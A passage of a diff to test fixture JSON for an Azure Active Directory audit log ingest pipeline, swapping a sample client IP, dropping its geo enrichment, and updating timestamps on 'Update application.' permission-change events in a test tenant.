\\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124815300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -191,25 +173,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -223,7 +187,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -337,7 +301,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -349,12 +313,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036040700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124825700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -380,25 +344,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -412,7 +358,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -526,7 +472,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -538,12 +484,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036048500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"